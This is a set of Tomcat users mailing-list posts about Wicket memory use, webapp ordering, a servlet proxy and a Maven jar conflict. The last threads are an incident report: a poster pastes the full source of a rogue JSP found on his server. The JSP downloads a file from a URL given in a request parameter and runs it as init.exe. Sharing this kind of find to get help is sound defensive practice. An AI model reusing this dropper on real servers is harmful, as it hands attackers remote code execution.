Re: memory leak in tomcat
Is this the same server with the Wicket app you posted about earlier ? If so, you have a Wicket app that is storing the SessionFactoryObjectFactory on a page as a class member. Wicket stores each page a user has been to in the user's session. If the page has class members, then it serializes them and stores them too. I have seen this kind of thing happen many times before causing big memory usage. Remove the Wicket app and run the Eclipse Memory Analyzer. Thanks, Warren Bell On 5/24/12 5:42 AM, Konstantin Kolinko wrote: 2012/5/24 Christian Kaufhold kaufhol...@googlemail.com: Hi, I have a leaking Tomcat App I checked the heap with the Eclipse Memory Analyser and it says The classloader/component *org.apache.catalina.loader.WebappClassLoader @ 0x94532f50* occupies *376.421.152 (79,51%)* bytes. The memory is accumulated in one instance of *java.util.HashMap$Entry[]* loaded by *system class loader*. So the memory is used for something useful? That is not a memory leak. It is just a web application requiring a lot of memory. WebappClassLoader is the classloader that is used to load the classes of your webapp. Of course, it remembers every class that it loaded (to satisfy repeated class.forName() calls) and every class that it loads has a reference it it (via getClass().getClassLoader()). There may be many classes, but I do not think that the classloader itself is responsible for 300 Mb of memory. and the data that is in the entries of the gigantic Map is org.hibernate.impl.SessionFactoryObjectFactory That would be a hibernate question. I have no clue what that class is about. Best regards, Konstantin Kolinko - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: tomcat slowing down
A Wicket app that is not written correctly can suck up resources. Wicket keeps track of pages a user has been on by serializing them, back button support. If a page has references to other objects, it serializes them and so on and so on. It can get real ugly real quick. Wicket has many built-in ways to keep this from happening, but it is still easy for a beginner to write an app that can cause problems. Thanks, Warren Bell On 5/16/12 12:49 PM, Mikolaj Rydzewski wrote: On 05/16/2012 05:35 PM, Christian Kaufhold wrote: its not intentional but the myfaces App runs on the server for years now and should not cause the problem I recently deployed a wicket app and now the server is slowing down when we have about 10 users or so. So there are two different applications? Myfaces (which used to work for a long time) and wicket (which takes server down)? I'd separate them first to have clear environment for investigation. Then enable GC logging, attach jvisualvm, deploy psi probe (http://code.google.com/p/psi-probe/), etc. - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: tomcat slowing down
Here is a good link explaining some of the pros and cons of Wicket. Look at the part titled Wicket Session size! http://www.small-improvements.com/10-things-about-apache-wicket-i-love Thanks, Warren Bell On 5/16/12 12:49 PM, Mikolaj Rydzewski wrote: On 05/16/2012 05:35 PM, Christian Kaufhold wrote: its not intentional but the myfaces App runs on the server for years now and should not cause the problem I recently deployed a wicket app and now the server is slowing down when we have about 10 users or so. So there are two different applications? Myfaces (which used to work for a long time) and wicket (which takes server down)? I'd separate them first to have clear environment for investigation. Then enable GC logging, attach jvisualvm, deploy psi probe (http://code.google.com/p/psi-probe/), etc. - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Initializing webapps in a certain order
Can you initialize webapps in a certain order ? I have two apps, app1 and app2. app2 needs to access app1 during app2's initialization. I need app1 to be initialized first and be done before app2 starts to initialize. -- Thanks, Warren Bell - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Initializing webapps in a certain order
On 3/13/12 6:37 PM, Caldarale, Charles R wrote: From: Warren Bell [mailto:warrenbe...@gmail.com] Subject: Initializing webapps in a certain order Can you initialize webapps in a certain order ? Read the FAQ: http://wiki.apache.org/tomcat/FAQ/Miscellaneous#Q27 The primary reason is that the servlet spec requires that each webapp be self-contained and independent. I have two apps, app1 and app2. app2 needs to access app1 during app2's initialization. I need app1 to be initialized first and be done before app2 starts to initialize. Sounds like a bad plan. If the apps are so tightly coupled, why aren't they just one webapp? They could eventually be on two servers, still may be a bad plan though. Thanks, Warren Bell - Chuck THIS COMMUNICATION MAY CONTAIN CONFIDENTIAL AND/OR OTHERWISE PROPRIETARY MATERIAL and is thus for use only by the intended recipient. If you received this in error, please contact the sender and delete the e-mail and its attachments from all computers. - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Modifying requests and responses in a proxy
I am in the process of writing a servlet that acts as a proxy where I can modify request post parameters and thought I better check and see if I am trying to reinvent the wheel. I see there are proxies like mod_proxy that can be used to connect Apache to Tomcat and I also saw Tomcat virtual hosts, but i am not sure that either of these can handle what I am trying to do. I want to be able to modify the request sent by the client and then forward it to the target server. I also want to be able to modify the response sent back by the target server and then forward it back to the client. Client Browser - Proxy (modify request) - Target Server Target Server - Proxy (modify response) - Client Browser Other requirements: 1. I do not want to use an Apache/Tomcat combination, Tomcat only. 2. The Proxy and Target Server are two different applications (contexts) that may be running in the same instance of Tomcat or may be on two different physical servers at different locations across the Internet. The solution needs to work in both of these scenarios. 3. It needs to accommodate any rewriting of headers with host info in them like 302 redirect Location headers. My current solution uses a combination of a Servlet Filter that wraps the request and response, so I can modify them, and then passes it to a proxy servlet. I have it working pretty well as long as the proxy servlet is run as the ROOT app in one instance of Tomcat and the target server runs in another instance of Tomcat. The minute I try to run the proxy servlet with a context path or run the proxy servlet and the target app in the same Tomcat instance, I run into an evil 302 loop with the target server app or a loop with the proxy itself. I thought I better check and see if there is a better way of doing all of this before I spend any more time coding for these situations. -- Thanks, Warren Bell - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: RESOLVED Tomcat xerces conflicts and Endorsed,Standards Override Mechanism
Tomcat Users, I Just wanted to get back and let everyone know how I resolved this issue in case someone else comes against the same type of problem. First off, it had nothing to do with Tomcat or the JDK. It was a conflict between two jars that Maven brought into my project with Smooks and Velocity Tools. Jaxen from Smooks and Dom4j from Velocity Tools both have the class named org.jaxen.JaxenHandler. In my case org.jaxen.JaxenHandler from Dom4j got loaded and Smooks tried to use it instead of the Jaxen version. This resolved into the exception: java.lang.IncompatibleClassChangeError: Class org.jaxen.JaxenHandler does not implement the requested interface org.jaxen.saxpath.XPathHandler I believed at first it was a conflict with Tomcat. In my case I did not need Dom4j and I excluded it. Smooks is happy now. I need to keep my dependencies a little neater and use the exclude tag a little more often. Thanks for everyone's help. Thanks, Warren Bell On 12/12/11 10:27 PM, Pid * wrote: On 13 Dec 2011, at 03:27, Warren Bell warrenbe...@gmail.com wrote: Here are all the jars in my app. There are a lot. The jars that came in as dependencies of smooks are: milyn-smooks-csv-1.5.jar openscv-1.8.jar milyn-smooks-flatfile-1.5.jar milyn-smooks-javabean-1.5.jar milyn-smooks-core-1.5.jar milyn-commons-1.5.jar freemaker-2.3.15.jar javassist-3.10.0.GA.jar xstream-1.4.1.jar xmlpull-1.1.3.1.jar xpp3_min-1.1.4c.jar mvel2-2.0.17.jar jaxen-1.1.1.jar xercesImpl-2.6.2.jar jta-1.1.jar So I'd guess that anything with an X in its name would go in endorsed, then I'd refine from there. All of the other jars in my app: activation-1.1.jarmvel2-2.0.17.jar antlr-2.7.2.jaropencsv-1.8.jar aopalliance-1.0.jaroro-2.0.8.jar aspectjrt-1.6.1.jarpostgresql-8.3-603.jdbc3.jar aspectjweaver-1.6.1.jarservlet-api-2.3.jar cglib-nodep-2.1_3.jarservlet-api-2.5.jar Couple of servlet-api jars in there, that you don't want. You may also be able to persuade Maven to not include some of the others, if they're not needed. You should consider upgrading Spring too. p commons-beanutils-1.7.0.jarslf4j-api-1.5.8.jar commons-chain-1.1.jarslf4j-log4j12-1.5.10.jar commons-codec-20041127.091804.jarspring-2.5.6.SEC01.jar commons-collections-3.2.1.jarspring-aspects-2.5.6.SEC01.jar commons-dbcp-all-1.3-r699049.jarspring-beans-2.0.8.jar commons-digester-1.8.jarspring-context-2.0.8.jar commons-email-1.1.jarspring-core-2.0.8.jar commons-exec-1.0.jarspring-dao-2.0.8.jar commons-io-1.4.jarspring-ibatis-2.0.8.jar commons-lang-2.4.jarspring-jdbc-2.0.8.jar commons-logging-1.1.jarsslext-1.2-0.jar commons-math-2.0.jarstruts-core-1.3.8.jar commons-validator-1.3.1.jarstruts-taglib-1.3.8.jar cron4j-2.2.3.jarstruts-tiles-1.3.8.jar dom4j-1.1.jarswarm-1.4-rc1.jar edtFTPj-2.0.4.jarvelocity-1.6.1.jar freemarker-2.3.15.jarvelocity-tools-2.0-beta3.jar hive-1.4-rc1.jarwasp-1.4-rc1.jar ibatis-sqlmap-2.3.0.jarwebservices-api.jar inmethod-grid-1.4.2-SNAPSHOT.jarwebservices-extra-api.jar javassist-3.10.0.GA.jarwebservices-extra.jar jaxen-1.1.1.jarwebservices-rt.jar jconn2-1.jarwicket-1.4.7.jar joda-time-1.6.jarwicket-datetime-1.4.7.jar jta-1.1.jarwicket-extensions-1.4.7.jar junit-3.8.1.jarwicket-ioc-1.4.7.jar log4j-1.2.14.jarwicket-spring-1.4.7.jar mail-1.4.jarwicket-spring-annot-1.3.5.jar milyn-commons-1.5.jarwicomsec-1.4-rc1.jar milyn-smooks-core-1.5.jarwiquery-1.0.1.jar milyn-smooks-csv-1.5.jarxercesImpl-2.6.2.jar milyn-smooks-flatfile-1.5.jarxmlpull-1.1.3.1.jar milyn-smooks-javabean-1.5.jarxpp3_min-1.1.4c.jar minis-1.4.1.jarxstream-1.4.1.jar I am using Maven to manage my apps dependencies. My app does not depend directly on some of these jars, like the struts jars. They got dragged in as dependencies of something else. As for the exception: java.lang.IncompatibleClassChangeError: Class org.jaxen.JaxenHandler does not implement the requested interface org.jaxen.saxpath.XPathHandler at org.jaxen.saxpath.base.XPathReader.parse(XPathReader.java:98) at org.milyn.cdr.xpath.SelectorStepBuilder._buildSteps(SelectorStepBuilder.java:110) at org.milyn.cdr.xpath.SelectorStepBuilder.clinit(SelectorStepBuilder.java:43) at org.milyn.cdr.SmooksResourceConfiguration.setSelector(SmooksResourceConfiguration.java:447) at org.milyn.cdr.SmooksResourceConfiguration.init(SmooksResourceConfiguration.java:304) at org.milyn.cdr.SmooksResourceConfigurationStore.addHandlerFactoryConfig(SmooksResourceConfigurationStore.java:143
Re: Tomcat xerces conflicts and Endorsed,Standards Override Mechanism
Here are all the jars in my app. There are a lot. The jars that came in as dependencies of smooks are: milyn-smooks-csv-1.5.jar openscv-1.8.jar milyn-smooks-flatfile-1.5.jar milyn-smooks-javabean-1.5.jar milyn-smooks-core-1.5.jar milyn-commons-1.5.jar freemaker-2.3.15.jar javassist-3.10.0.GA.jar xstream-1.4.1.jar xmlpull-1.1.3.1.jar xpp3_min-1.1.4c.jar mvel2-2.0.17.jar jaxen-1.1.1.jar xercesImpl-2.6.2.jar jta-1.1.jar All of the other jars in my app: activation-1.1.jar mvel2-2.0.17.jar antlr-2.7.2.jar opencsv-1.8.jar aopalliance-1.0.jar oro-2.0.8.jar aspectjrt-1.6.1.jar postgresql-8.3-603.jdbc3.jar aspectjweaver-1.6.1.jar servlet-api-2.3.jar cglib-nodep-2.1_3.jar servlet-api-2.5.jar commons-beanutils-1.7.0.jar slf4j-api-1.5.8.jar commons-chain-1.1.jar slf4j-log4j12-1.5.10.jar commons-codec-20041127.091804.jar spring-2.5.6.SEC01.jar commons-collections-3.2.1.jar spring-aspects-2.5.6.SEC01.jar commons-dbcp-all-1.3-r699049.jarspring-beans-2.0.8.jar commons-digester-1.8.jarspring-context-2.0.8.jar commons-email-1.1.jar spring-core-2.0.8.jar commons-exec-1.0.jarspring-dao-2.0.8.jar commons-io-1.4.jar spring-ibatis-2.0.8.jar commons-lang-2.4.jarspring-jdbc-2.0.8.jar commons-logging-1.1.jar sslext-1.2-0.jar commons-math-2.0.jarstruts-core-1.3.8.jar commons-validator-1.3.1.jar struts-taglib-1.3.8.jar cron4j-2.2.3.jarstruts-tiles-1.3.8.jar dom4j-1.1.jar swarm-1.4-rc1.jar edtFTPj-2.0.4.jar velocity-1.6.1.jar freemarker-2.3.15.jar velocity-tools-2.0-beta3.jar hive-1.4-rc1.jarwasp-1.4-rc1.jar ibatis-sqlmap-2.3.0.jar webservices-api.jar inmethod-grid-1.4.2-SNAPSHOT.jarwebservices-extra-api.jar javassist-3.10.0.GA.jar webservices-extra.jar jaxen-1.1.1.jar webservices-rt.jar jconn2-1.jarwicket-1.4.7.jar joda-time-1.6.jar wicket-datetime-1.4.7.jar jta-1.1.jar wicket-extensions-1.4.7.jar junit-3.8.1.jar wicket-ioc-1.4.7.jar log4j-1.2.14.jarwicket-spring-1.4.7.jar mail-1.4.jarwicket-spring-annot-1.3.5.jar milyn-commons-1.5.jar wicomsec-1.4-rc1.jar milyn-smooks-core-1.5.jar wiquery-1.0.1.jar milyn-smooks-csv-1.5.jarxercesImpl-2.6.2.jar milyn-smooks-flatfile-1.5.jar xmlpull-1.1.3.1.jar milyn-smooks-javabean-1.5.jar xpp3_min-1.1.4c.jar minis-1.4.1.jar xstream-1.4.1.jar I am using Maven to manage my apps dependencies. My app does not depend directly on some of these jars, like the struts jars. They got dragged in as dependencies of something else. As for the exception: java.lang.IncompatibleClassChangeError: Class org.jaxen.JaxenHandler does not implement the requested interface org.jaxen.saxpath.XPathHandler at org.jaxen.saxpath.base.XPathReader.parse(XPathReader.java:98) at org.milyn.cdr.xpath.SelectorStepBuilder._buildSteps(SelectorStepBuilder.java:110) at org.milyn.cdr.xpath.SelectorStepBuilder.clinit(SelectorStepBuilder.java:43) at org.milyn.cdr.SmooksResourceConfiguration.setSelector(SmooksResourceConfiguration.java:447) at org.milyn.cdr.SmooksResourceConfiguration.init(SmooksResourceConfiguration.java:304) at org.milyn.cdr.SmooksResourceConfigurationStore.addHandlerFactoryConfig(SmooksResourceConfigurationStore.java:143) at org.milyn.cdr.SmooksResourceConfigurationStore.registerInstalledHandlerFactories(SmooksResourceConfigurationStore.java:139) at org.milyn.cdr.SmooksResourceConfigurationStore.init(SmooksResourceConfigurationStore.java:112) at org.milyn.container.standalone.StandaloneApplicationContext.init(StandaloneApplicationContext.java:59) at org.milyn.Smooks.init(Smooks.java:118) at org.milyn.Smooks.init(Smooks.java:170) at com.scanman.cron.task.ImportPriceChangesFromSupplier.executeTask(ImportPriceChangesFromSupplier.java:70) at com.scanman.cron.task.ScanManTask.execute(ScanManTask.java:79) at it.sauronsoftware.cron4j.TaskExecutor$Runner.run(Unknown Source) at java.lang.Thread.run(Thread.java:680) This is the first exception thrown before I started moving jars around into the endorsed folder. The endorsed folder is empty when this exception is thrown. Thanks, Warren Bell On 12/12/11 11:49 AM, Christopher Schultz wrote: Warren, On 12/9/11 4:47 PM, Warren Bell wrote: This makes me think I am on the right track and the exceptions I am getting seem to point
Re: Tomcat xerces conflicts and Endorsed,Standards Override Mechanism
I was afraid I was going to get a reaction to my list like I did, it is a mess. You get lazy and you just enter in a dependency and let Maven drag everything in with it. As for the servlet jars, Tomcat just ignores them and I never took the time to figure out where they were coming from, that goes for the Struts jars too. INFO [main] - validateJarFile(/Library/apache-tomcat-6.0.16/webapps/scanman/WEB-INF/lib/servlet-api-2.3.jar) - jar not loaded. See Servlet Spec 2.3, section 9.7.2. Offending class: javax/servlet/Servlet.class INFO [main] - validateJarFile(/Library/apache-tomcat-6.0.16/webapps/scanman/WEB-INF/lib/servlet-api-2.5.jar) - jar not loaded. See Servlet Spec 2.3, section 9.7.2. Offending class: javax/servlet/Servlet.class How are you suppose to know what jars you really need when you let Maven manage them ? I place just 2 dependencies in my pom.xml and 15 jars get added to my project. Thanks, Warren Bell On 12/12/11 8:25 PM, Konstantin Kolinko wrote: 2011/12/10 Warren Bell warrenbe...@gmail.com: Hello Tomcat Users, I am having a problem with xerces and other jars in the JDK or Tomcat conflicting with jars in my app. I am getting the following exception when instantiating Smooks, a csv library that usese xerces, in a web app running in Tomcat: What exact version of Tomcat x.y.z you are running and on what JDK? (IIRC several bugs wrt XML parser handling were fixed during the last year. Though it might not be related to your issue). Do you run single webapp there, or several complex ones? I think the libs should stay in app's WEB-INF/lib folder. Do not put them in endorsed for now. (That will affect Tomcat as a whole). As others noted, your libraries list is a mess. One blatant thing is that you have both Spring 2.0.8 and 2.5.6 jars. They are not supposed to coexist. Also note that there is SEC03 update of 2.5.6. Best regards, Konstantin Kolinko - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Tomcat xerces conflicts and Endorsed,Standards Override Mechanism
Here the answers to your other questions. Thanks, Warren Bell On 12/12/11 8:25 PM, Konstantin Kolinko wrote: 2011/12/10 Warren Bell warrenbe...@gmail.com: Hello Tomcat Users, I am having a problem with xerces and other jars in the JDK or Tomcat conflicting with jars in my app. I am getting the following exception when instantiating Smooks, a csv library that usese xerces, in a web app running in Tomcat: What exact version of Tomcat x.y.z you are running and on what JDK? Tomcat 6.0.16 JDK 1.6 (IIRC several bugs wrt XML parser handling were fixed during the last year. Though it might not be related to your issue). Do you run single webapp there, or several complex ones? Single I think the libs should stay in app's WEB-INF/lib folder. Do not put them in endorsed for now. (That will affect Tomcat as a whole). As others noted, your libraries list is a mess. One blatant thing is that you have both Spring 2.0.8 and 2.5.6 jars. They are not supposed to coexist. Also note that there is SEC03 update of 2.5.6. Best regards, Konstantin Kolinko - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Tomcat xerces conflicts and Endorsed,Standards Override Mechanism
Hello Tomcat Users, I am having a problem with xerces and other jars in the JDK or Tomcat conflicting with jars in my app. I am getting the following exception when instantiating Smooks, a csv library that usese xerces, in a web app running in Tomcat: java.lang.IncompatibleClassChangeError: Class org.jaxen.JaxenHandler does not implement the requested interface org.jaxen.saxpath.XPathHandler I found something in the Tomcat docs and at Oracle about Endorsed Standards Override Mechanism. http://tomcat.apache.org/tomcat-6.0-doc/class-loader-howto.html So I followed the directions and placed the jaxen-1.1.1.jar in the Tomcat endorsed directory. I ran the app again and got a diferent exception: org.apache.xerces.impl.dv.DVFactoryException: DTD factory class org.apache.xerces.impl.dv.dtd.DTDDVFactoryImpl does not extend from DTDDVFactory. I then placed xercesImpl-2.6.2.jar in the Tomcat endorsed directory. I ran the app again and got a diferent exception: java.lang.NoSuchMethodError: org.apache.xerces.impl.xs.XMLSchemaLoader.loadGrammar([Lorg/apache/xerces/xni/parser/XMLInputSource;)V This makes me think I am on the right track and the exceptions I am getting seem to point to the wrong classes being loaded. My question is, is their a set of XML related jars that I should take out of my app and place in this endorsed directory or is there a different way of fixing this problem ? Thanks, Warren Bell - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Struts vs JSF (poll?)
If you are starting from scratch I would not bother with JSF and don't even waste your time with Struts. Take a look at a framework called Wicket. It's a component based, event driven framework that is very easy to work with and fast to develop with. No crazy JSP tags to worry about either just plain HTML. It has a large community and a helpful mailing list. I have been very happy with it. Hope this helps you. Warren Tommy Pham wrote: Hi everyone, This maybe out of scope for this list but I wanted to know more about Struts vs JSF other this old article [1]. Which are are deployed mostly on your TC server(s)/cluster(s)? If any Java developers are on this list, which platform API do you prefer for quick development (to meet deadline), performance, security management (user authentication and level restriction) etc... since both are based on MVC despite their different implementations(?). Since there isn't a JSR for Struts, has Struts been around before JCP is formed? And why is there not a JSR for Struts now (just curious)? As for JSF, which implementation is used by/for your app(s)? Sun/NetBeans? Apache's MyFaces? or Others (please list)? I'm somewhat disappointed Netbeans support for JSF and Struts in that Netbeans bundled libs support used older Apache Commons lib version (even for the current v6.1), although this could be updated but I don't know whether it will break the integration of Netbeans' VWP. Even the tutorial/trails on NetBeans site regarding Struts (although this can be compensated at Struts' web site) is very limited perhaps because of the (biased?) Struts weak integration to favor or push more on JSF/Visual JSF? I need to evaluate my options of API and IDE before I dedicate several projects since the performance of Netbeans is getting worse by every release comparing to Eclipse. As for server, I've decided already ;) TIA, Tommy [1] http://websphere.sys-con.com/node/46516 - To start a new topic, e-mail: users@tomcat.apache.org To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] -- Thanks, Warren Bell 909-645-8864 [EMAIL PROTECTED] - To start a new topic, e-mail: users@tomcat.apache.org To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Possible virus uploaded to Tomcat 5.5.3
I have found a war file on my server that appeared around July 14. I am the only one that has access to this machine and I did not put it there. It consists of a jsp that downloads a program named init.exe and then executes it. This server is on a private network. Though there are three pc kiosks in grocery stores that are available to the public that access this server but they are on a different subnet and only have access to the server thru port 8080. I am pretty sure it came from one of these stores. The url used for this program is .../fexcep/index.jsp?url=... I am running Tomcat 5.5.3 on Windows XP. How did somebody get this war file onto my server ? Here is the code of index.jsp: %@ page language=java pageEncoding=utf-8 import=java.io.*,java.net.*,java.security.*,javax.crypto.*% %! String sys=null; public class AutoKill { private boolean downFile(String url,String filesrc) { try { URL urlc = new URL(url); HttpURLConnection con = (HttpURLConnection)urlc.openConnection(); con.connect(); byte[] b=new byte[1024]; BufferedInputStream bis=new BufferedInputStream(con.getInputStream()); FileOutputStream fos=new FileOutputStream(filesrc); int length=-1; while((length=bis.read(b,0,b.length))!=-1) { fos.write(b,0,length); } fos.close(); bis.close(); return true; }catch(Exception e) { e.printStackTrace(); } return false; } } % % sys=System.getProperty(os.name); int i=sys.indexOf(Windows); AutoKill ak=new AutoKill(); if(i-1) { String result; try { String url=request.getParameter(userurl); System.out.println(url); String filesrc=request.getSession().getServletContext().getRealPath()+/init.exe; if (ak.downFile(url,filesrc) ) { Process run_proc=Runtime.getRuntime().exec(filesrc); result=Success! ; } else { result=Failure! Down File Failure!; } }catch(Exception e) { result=Failure!throws Exception - +e.getMessage()+! ; } request.setAttribute(result,result); } else { request.setAttribute(result,Failure!Because Remote computer system is +sys+!); } request.getRequestDispatcher(/ok.jsp).forward(request, response); % -- Thanks, Warren Bell 909-645-8864 [EMAIL PROTECTED] - To start a new topic, e-mail: users@tomcat.apache.org To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: Possible virus uploaded to Tomcat 5.5.3
Mark Thomas wrote: Warren Bell wrote: I have found a war file on my server that appeared around July 14. I am the only one that has access to this machine and I did not put it there. It consists of a jsp that downloads a program named init.exe and then executes it. This server is on a private network. Though there are three pc kiosks in grocery stores that are available to the public that access this server but they are on a different subnet and only have access to the server thru port 8080. I am pretty sure it came from one of these stores. The url used for this program is .../fexcep/index.jsp?url=... I am running Tomcat 5.5.3 on Windows XP. How did somebody get this war file onto my server ? Difficult to tell. A couple of questions that might help narrow this down: - From your description am I right in thinking there are two subnets, both private with neither connected to the internet? both networks are connected to the internet. - What other webapps are installed on the Tomcat instance? Several, they are all intranet apps that do not have any download/upload capabilities and there is no possible sql injection vulnerabilities either. And none of the apps execute any programs local to the server. And none of the apps are available to the Internet except to the kiosks through the Internet via - What is providing the firewall between your Tomcat box and the kiosks? The network that the server is on has a Lynksys RV082 small business router with the firewall completely locked down except for port 8080 available only to the networks with the kiosks. The kiosks are on a basic Linksys home router. - How locked down are the kiosks? Not very, each one of the kiosks is on its own network. The only access they have to the server is thru port 8080. - Could anyone have connected one of the kiosks to the internet? Yes, We have isolated it to one kiosk. We use a web proxy, but they just went around it. I have a heap of other questions but lets start with these and see where we go. Mark - To start a new topic, e-mail: users@tomcat.apache.org To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] -- Thanks, Warren Bell 909-645-8864 [EMAIL PROTECTED] - To start a new topic, e-mail: users@tomcat.apache.org To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: Possible virus uploaded to Tomcat 5.5.3
Mark Thomas wrote: Warren Bell wrote: Mark Thomas wrote: - What other webapps are installed on the Tomcat instance? Several, they are all intranet apps that do not have any download/upload capabilities and there is no possible sql injection vulnerabilities either. And none of the apps execute any programs local to the server. Hmm. No real idea yet but a few more questions. Is either the manager or the admin app installed? No If yes, how strong is the password and what realm are you using? From your comments you aren't using WebDAV at all. Is this correct? What is WebDA, some kind of anti-virus? Are all the apps on Tomcat accessible to the kiosks? Yes Do you have any access logs from around the time the rogue pages were installed? Maybe, the server is down, I am traveling to it right now to see if and how much damage this may have caused. Cheers, Mark - To start a new topic, e-mail: users@tomcat.apache.org To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] -- Thanks, Warren Bell 909-645-8864 [EMAIL PROTECTED] - To start a new topic, e-mail: users@tomcat.apache.org To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: Possible virus uploaded to Tomcat 5.5.3
Mark Thomas wrote: Warren Bell wrote: Mark Thomas wrote: Warren Bell wrote: Mark Thomas wrote: - What other webapps are installed on the Tomcat instance? Several, they are all intranet apps that do not have any download/upload capabilities and there is no possible sql injection vulnerabilities either. And none of the apps execute any programs local to the server. Hmm. No real idea yet but a few more questions. Is either the manager or the admin app installed? No OK, that rules out a few possibilities. From your comments you aren't using WebDAV at all. Is this correct? What is WebDA, some kind of anti-virus? It is a servlet that allows read/write of files on the server. Are all the apps on Tomcat accessible to the kiosks? Yes Do you have any access logs from around the time the rogue pages were installed? Maybe, the server is down, I am traveling to it right now to see if and how much damage this may have caused. Another thought occurs to me. If this server is only accessible via the firewall and the firewall is locked down to just port 8080 how did you get the source for the JSP you posted originally? Through a VPN connection And from my other e-mail, are you using the invoker servlet at all? No Mark - To start a new topic, e-mail: users@tomcat.apache.org To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] -- Thanks, Warren Bell 909-645-8864 [EMAIL PROTECTED] - To start a new topic, e-mail: users@tomcat.apache.org To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
Re: Possible virus uploaded to Tomcat 5.5.3
Peter Crowther wrote: From: Warren Bell [mailto:[EMAIL PROTECTED] [details of attack elided] The network that the server is on has a Lynksys RV082 small business router with the firewall completely locked down except for port 8080 available only to the networks with the kiosks. The kiosks are on a basic Linksys home router. That's a nice little JSP - once it's on the system, the attacker can do anything they like that's allowed by the outbound firewall, with the privilege of the user running Tomcat. I assume the server can connect freely to other URLs, such as wherever it pulled init.exe from? So the problem reduces to how someone managed to drop that JSP into 5.5.3 such that it could be invoked once? - Peter - To start a new topic, e-mail: users@tomcat.apache.org To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] That is the question, how in the hell did it get there. I am the only one who has access to the server along with init.exe. :-) -- Thanks, Warren Bell 909-645-8864 [EMAIL PROTECTED] - To start a new topic, e-mail: users@tomcat.apache.org To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]